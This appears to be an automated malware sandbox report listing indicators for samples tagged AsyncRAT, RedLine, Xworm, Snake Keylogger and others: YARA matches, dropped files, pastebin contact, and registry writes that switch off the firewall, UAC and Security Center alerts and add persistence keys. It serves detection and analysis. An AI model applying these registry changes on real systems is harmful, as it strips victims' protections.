asyncrat | d5395f121277d2b38f4173c7df0a20a3de99edfcfe2aa697080cc81170eb76ab

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}"	016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad	Ikcmbfcj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}"	Mahnhhod.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad	Mblcnj32.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad	Nknobkje.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}"	Nknobkje.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}"	Ikcmbfcj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}"	Jnhpoamf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}"	Kgamnded.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad	Nbcjnilj.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad	016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad	Iakiia32.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad	Ihgnkkbd.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad	Knbbep32.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad	Kgamnded.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad	Mahnhhod.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}"	Mblcnj32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}"	Iakiia32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}"	Ihgnkkbd.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad	Jnhpoamf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}"	Knbbep32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}"	Nbcjnilj.exe

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Berbew
Berbew is a backdoor written in C++.
backdoor berbew
Berbew family
berbew
CyberGate, Rebhip
CyberGate is a lightweight remote administration tool with a wide array of functionalities.
trojan stealer cybergate
Cybergate family
cybergate

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral13/files/0x001900000002adb9-431.dat	family_xworm
behavioral13/memory/952-504-0x0000000000B70000-0x0000000000B86000-memory.dmp	family_xworm

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Modifies firewall policy service 3 TTPs 3 IoCs

defense_evasion

Modify Registry

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral13/memory/2952-699-0x00000000005C0000-0x0000000000612000-memory.dmp	family_redline

Redline family
redline
Sality
Sality is backdoor written in C++, first discovered in 2003.
backdoor sality
Sality family
sality
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 1 IoCs

resource	yara_rule
behavioral13/memory/5220-616-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger

Snakekeylogger family
snakekeylogger

UAC bypass 3 TTPs 1 IoCs

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe

Windows security bypass 2 TTPs 12 IoCs

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\FirewallDisableNotify = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\FirewallOverride = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\UpdatesDisableNotify = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\UacDisableNotify = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\AntiVirusOverride = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\AntiVirusDisableNotify = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral13/files/0x001c00000002ad7c-290.dat	family_asyncrat

CryptOne packer 1 IoCs

Detects CryptOne packer defined in NCC blogpost.

cryptone packer

resource	yara_rule
behavioral13/files/0x001900000002ad6d-155.dat	cryptone

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2212	powershell.exe
5824	powershell.exe
4348	powershell.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Morfey.lnk	5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe

Executes dropped EXE 22 IoCs

pid	Process
620	0d4c465488b6f5f760e98a15d77da181419223fdd93915e0fb90646c645b7766.exe
668	5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe
784	016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
2072	90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe
4056	Iakiia32.exe
4300	1955e7fe3c25216101d012eb0b33f527.exe
3396	Ikcmbfcj.exe
440	Morfey.EXE
3884	Ihgnkkbd.exe
1200	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
1164	be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe
4240	Jnhpoamf.exe
3172	bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe
1452	Knbbep32.exe
3688	c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe
1016	Kgamnded.exe
3904	gold.exe
3244	Mahnhhod.exe
4980	VCREDI~2.EXE
4496	Mblcnj32.exe
1676	Nbcjnilj.exe
2316	Nknobkje.exe

Loads dropped DLL 3 IoCs

pid	Process
1164	be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe
1164	be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe
1164	be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe

Uses the VBS compiler for execution 1 TTPs

Command and Scripting Interpreter
T1059

Windows security modification 2 TTPs 13 IoCs

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\AntiVirusOverride = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\UpdatesDisableNotify = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\AntiVirusDisableNotify = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\FirewallDisableNotify = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\FirewallOverride = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc\UacDisableNotify = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Morfey.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\""	bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

persistence privilege_escalation

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	pastebin.com
19	pastebin.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	checkip.dyndns.org
32	reallyfreegeoip.org
33	reallyfreegeoip.org

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral13/memory/5620-524-0x0000000000400000-0x00000000004CA000-memory.dmp	autoit_exe
behavioral13/memory/5620-671-0x0000000000400000-0x00000000004CA000-memory.dmp	autoit_exe

Drops file in System32 directory 34 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Nknobkje.exe	Nbcjnilj.exe
File created	C:\Windows\SysWOW64\Kalhafbk.dll	Nknobkje.exe
File created	C:\Windows\SysWOW64\Ddnnfbmk.dll	016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
File created	C:\Windows\SysWOW64\Ikcmbfcj.exe	Iakiia32.exe
File opened for modification	C:\Windows\SysWOW64\Kgamnded.exe	Knbbep32.exe
File created	C:\Windows\SysWOW64\Mblcnj32.exe	Mahnhhod.exe
File created	C:\Windows\SysWOW64\Ddhmmpnk.dll	Mahnhhod.exe
File created	C:\Windows\SysWOW64\Knbbep32.exe	Jnhpoamf.exe
File created	C:\Windows\SysWOW64\Peehmbji.dll	Mblcnj32.exe
File created	C:\Windows\SysWOW64\Lndigcej.dll	Iakiia32.exe
File created	C:\Windows\SysWOW64\Heolpdjf.dll	Ikcmbfcj.exe
File created	C:\Windows\SysWOW64\Jnhpoamf.exe	Ihgnkkbd.exe
File created	C:\Windows\SysWOW64\Dgcaaddl.dll	Nbcjnilj.exe
File created	C:\Windows\SysWOW64\Ejjlbppk.dll	Ihgnkkbd.exe
File created	C:\Windows\SysWOW64\Ophpeg32.dll	Jnhpoamf.exe
File created	C:\Windows\SysWOW64\Hijjli32.dll	Knbbep32.exe
File created	C:\Windows\SysWOW64\Objpoh32.exe	Nknobkje.exe
File opened for modification	C:\Windows\SysWOW64\Nknobkje.exe	Nbcjnilj.exe
File opened for modification	C:\Windows\SysWOW64\Iakiia32.exe	016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
File created	C:\Windows\SysWOW64\Kgamnded.exe	Knbbep32.exe
File created	C:\Windows\SysWOW64\Mahnhhod.exe	Kgamnded.exe
File created	C:\Windows\SysWOW64\Cobhcgin.dll	Kgamnded.exe
File opened for modification	C:\Windows\SysWOW64\Nbcjnilj.exe	Mblcnj32.exe
File opened for modification	C:\Windows\SysWOW64\Objpoh32.exe	Nknobkje.exe
File created	C:\Windows\SysWOW64\Iakiia32.exe	016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
File opened for modification	C:\Windows\SysWOW64\Ikcmbfcj.exe	Iakiia32.exe
File created	C:\Windows\SysWOW64\Ihgnkkbd.exe	Ikcmbfcj.exe
File opened for modification	C:\Windows\SysWOW64\Ihgnkkbd.exe	Ikcmbfcj.exe
File opened for modification	C:\Windows\SysWOW64\Jnhpoamf.exe	Ihgnkkbd.exe
File opened for modification	C:\Windows\SysWOW64\Knbbep32.exe	Jnhpoamf.exe
File opened for modification	C:\Windows\SysWOW64\Mahnhhod.exe	Kgamnded.exe
File opened for modification	C:\Windows\SysWOW64\Mblcnj32.exe	Mahnhhod.exe
File opened for modification	C:\Windows\SysWOW64\Anraabelsens\Hyposternal.udk	90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe
File created	C:\Windows\SysWOW64\Nbcjnilj.exe	Mblcnj32.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3172 set thread context of 2000	3172	bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe	107

UPX packed file 16 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral13/memory/1200-145-0x0000000002740000-0x00000000037CE000-memory.dmp	upx
behavioral13/memory/1200-216-0x0000000002740000-0x00000000037CE000-memory.dmp	upx
behavioral13/memory/1200-157-0x0000000002740000-0x00000000037CE000-memory.dmp	upx
behavioral13/memory/1200-191-0x0000000002740000-0x00000000037CE000-memory.dmp	upx
behavioral13/memory/1200-215-0x0000000002740000-0x00000000037CE000-memory.dmp	upx
behavioral13/memory/1200-217-0x0000000002740000-0x00000000037CE000-memory.dmp	upx
behavioral13/files/0x001900000002adcf-495.dat	upx
behavioral13/memory/2000-350-0x0000000011120000-0x0000000011185000-memory.dmp	upx
behavioral13/memory/1200-339-0x0000000002740000-0x00000000037CE000-memory.dmp	upx
behavioral13/memory/5620-524-0x0000000000400000-0x00000000004CA000-memory.dmp	upx
behavioral13/memory/1200-269-0x0000000002740000-0x00000000037CE000-memory.dmp	upx
behavioral13/memory/1200-271-0x0000000002740000-0x00000000037CE000-memory.dmp	upx
behavioral13/memory/1200-218-0x0000000002740000-0x00000000037CE000-memory.dmp	upx
behavioral13/memory/1200-182-0x0000000002740000-0x00000000037CE000-memory.dmp	upx
behavioral13/memory/1200-164-0x0000000002740000-0x00000000037CE000-memory.dmp	upx
behavioral13/memory/5620-671-0x0000000000400000-0x00000000004CA000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SYSTEM.INI	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs

Installer Packages

T1546.016

Msiexec

T1218.007

pid	Process
5184	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VCREDI~2.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Knbbep32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Kgamnded.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gold.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mblcnj32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Fello_s_Revenge.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1955e7fe3c25216101d012eb0b33f527.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mahnhhod.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Nbcjnilj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Nknobkje.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ikcmbfcj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ihgnkkbd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0d4c465488b6f5f760e98a15d77da181419223fdd93915e0fb90646c645b7766.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Iakiia32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Jnhpoamf.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral13/files/0x001900000002ad61-134.dat	nsis_installer_1
behavioral13/files/0x001900000002ad61-134.dat	nsis_installer_2

Modifies registry class 37 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32	Mahnhhod.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment"	Mblcnj32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32	Nbcjnilj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment"	Nbcjnilj.exe
Key created	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000_Classes\Local Settings	Fello_s_Revenge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32	Nknobkje.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32	016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32	Ihgnkkbd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment"	Ihgnkkbd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32	Knbbep32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node	016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}	016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32	Iakiia32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Heolpdjf.dll"	Ikcmbfcj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Hijjli32.dll"	Knbbep32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment"	Nknobkje.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID	016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment"	Iakiia32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Ophpeg32.dll"	Jnhpoamf.exe
